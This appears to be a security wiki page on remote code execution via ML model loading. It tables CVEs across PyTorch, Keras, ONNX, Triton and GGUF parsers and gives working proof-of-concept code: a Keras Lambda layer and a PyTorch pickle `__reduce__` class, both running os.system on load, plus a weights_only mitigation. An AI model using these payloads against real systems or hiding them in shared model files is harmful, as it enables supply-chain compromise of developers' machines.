Models RCE
Loading models to RCE
Machine Learning models are often shared in different formats, such as ONNX, TensorFlow, PyTorch, etc. These models are loaded onto developers' machines or production systems in order to use them. Normally a model should not contain malicious code, but there are cases where a model can be used to execute arbitrary code on the system, either as an intended feature or because of a vulnerability in the model-loading library.
At the time of writing, these are some examples of this type of vulnerability:
| Framework / Tool | Vulnerability (CVE if available) | RCE Vector |
|---|---|---|
| PyTorch (Python) | Insecure deserialization in `torch.load` (CVE-2025-32434) | Malicious pickle in model checkpoint leads to code execution (bypassing `weights_only` safeguard) |
| PyTorch TorchServe | ShellTorch – CVE-2023-43654, CVE-2022-1471 | SSRF + malicious model download causes code execution; Java deserialization RCE in management API |
| TensorFlow/Keras | CVE-2021-37678 (unsafe YAML)<br>CVE-2024-3660 (Keras Lambda) | Loading a model from YAML uses `yaml.unsafe_load` (code exec)<br>Loading a model with a Lambda layer runs arbitrary Python code (see the sketch after the table) |
| TensorFlow (TFLite) | CVE-2022-23559 (TFLite parsing) | Crafted `.tflite` model triggers integer overflow → heap corruption (potential RCE) |
| Scikit-learn (Python) | CVE-2020-13092 (joblib/pickle) | Loading a model via `joblib.load` executes a pickle with the attacker's `__reduce__` payload |
| NumPy (Python) | CVE-2019-6446 (unsafe `np.load`), disputed | `numpy.load` by default allowed pickled object arrays → a malicious `.npy`/`.npz` file triggers code exec |
| ONNX / ONNX Runtime | CVE-2022-25882 (dir traversal)<br>CVE-2024-5187 (tar traversal) | ONNX model's external-weights path can escape the directory (read arbitrary files)<br>Malicious ONNX model tar can overwrite arbitrary files (leading to RCE) |
| ONNX Runtime (design risk) | (No CVE) ONNX custom ops / control flow | Model with a custom operator requires loading the attacker's native code; complex model graphs abuse logic to execute unintended computations |
| NVIDIA Triton Server | CVE-2023-31036 (path traversal) | Using the model-load API with `--model-control` enabled allows relative path traversal to write files (e.g., overwrite `.bashrc` for RCE) |
| GGML (GGUF format) | CVE-2024-25664 … 25668 (multiple heap overflows) | Malformed GGUF model file causes heap buffer overflows in the parser, enabling arbitrary code execution on the victim system |
| Keras (older formats) | (No new CVE) Legacy Keras H5 model | Malicious HDF5 (`.h5`) model with Lambda layer code still executes on load (Keras `safe_mode` doesn't cover the old format – "downgrade attack") |
| Others (general) | Design flaw – Pickle serialization | Many ML tools (e.g., pickle-based model formats, Python `pickle.load`) will execute arbitrary code embedded in model files unless mitigated |
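As an illustration of the Keras Lambda-layer vector from the table, here is a minimal sketch. File names, paths and the payload command are made up for the example, and it assumes a TensorFlow/Keras install where the legacy H5 path still serializes the Lambda function's bytecode; on newer Keras versions the victim would additionally have to pass `safe_mode=False`. The attacker ships a model whose Lambda layer wraps arbitrary Python, which runs when the victim rebuilds and uses the model:

```python
# keras_lambda_poc.py - illustrative sketch, not a drop-in exploit
import tensorflow as tf

# Arbitrary Python wrapped in a Lambda layer; the os.system call runs whenever
# the layer is traced/executed, including when the model is rebuilt after loading
payload = lambda x: (__import__("os").system("echo 'lambda layer executed' > /tmp/keras_pwned.txt"), x)[1]

model = tf.keras.Sequential([
    tf.keras.Input(shape=(1,)),
    tf.keras.layers.Lambda(payload),
])
model.save("malicious_lambda.h5")  # legacy HDF5 format marshals the lambda's bytecode

# Victim side (separate process) - version-dependent, shown as comments:
# loaded = tf.keras.models.load_model("malicious_lambda.h5", safe_mode=False)
# loaded.predict([[1.0]])  # by this point the payload has executed
```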
In addition, there are several Python pickle-based model formats, such as the ones used by PyTorch, that can be used to execute arbitrary code on the system if they are not loaded with `weights_only=True`. Therefore, any pickle-based model is particularly susceptible to this type of attack, even if it is not listed in the table above.
Example:
- Create the model:
```python
# attacker_payload.py
import torch
import os

class MaliciousPayload:
    def __reduce__(self):
        # This code is executed when the pickle is deserialized (i.e., inside torch.load)
        return (os.system, ("echo 'You have been hacked!' > /tmp/pwned.txt",))

# Create a fake model state dict with malicious content
malicious_state = {"fc.weight": MaliciousPayload()}

# Save the malicious state dict
torch.save(malicious_state, "malicious_state.pth")
```
- Load the model:
```python
# victim_load.py
import torch
import torch.nn as nn

class MyModel(nn.Module):
    def __init__(self):
        super().__init__()
        self.fc = nn.Linear(10, 1)

model = MyModel()

# ⚠️ This will trigger code execution from the pickle inside the .pth file
model.load_state_dict(torch.load("malicious_state.pth", weights_only=False))
# /tmp/pwned.txt is created even if you get an error
```
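For contrast, this is a minimal sketch of what the `weights_only=True` safeguard does with the same file. It assumes a patched PyTorch build; recall from the table that CVE-2025-32434 allowed bypassing this check in older affected versions, so it is a mitigation, not a guarantee:

```python
# victim_load_safe.py - sketch assuming a PyTorch version where weights_only is enforced
import torch

try:
    # The restricted unpickler only allows tensors and a small allowlist of types,
    # so the os.system global in the malicious pickle is rejected before it can run
    state = torch.load("malicious_state.pth", weights_only=True)
except Exception as e:
    print(f"Refused to load untrusted pickle: {e}")
```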